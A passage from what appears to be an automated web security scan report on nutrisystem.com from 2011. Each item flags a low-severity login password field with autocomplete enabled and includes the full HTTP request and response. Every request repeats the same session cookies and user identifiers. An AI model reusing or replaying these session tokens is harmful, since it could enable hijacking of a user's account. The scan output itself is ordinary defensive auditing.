Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/basic.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.13. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/diabetes.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/men/diabetes.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Location: /jsps_hmr/product-pages/diabetic_overview.jsp
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:18:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Defect #671 - Need to inc
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/diabetes.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.14. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/silver.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/men/silver.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:17:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/silver.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.15. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/vegetarian.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/men/vegetarian.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:19:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/vegetarian.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.16. http://www.nutrisystem.com/jsps_hmr/catalog/menu/food.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/menu/food.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/menu/food.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/menu/food.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.17. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/basic.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/women/basic.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/basic.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.18. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/diabetes.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/women/diabetes.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Location: /jsps_hmr/product-pages/diabetic_overview.jsp
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to inclu
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/diabetes.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.19. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/silver.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/women/silver.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to include s
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/silver.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.20. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/vegetarian.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/women/vegetarian.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/vegetarian.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.21. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/corporate/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/corporate/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/corporate/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.22. http://www.nutrisystem.com/jsps_hmr/faq/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/faq/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/faq/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

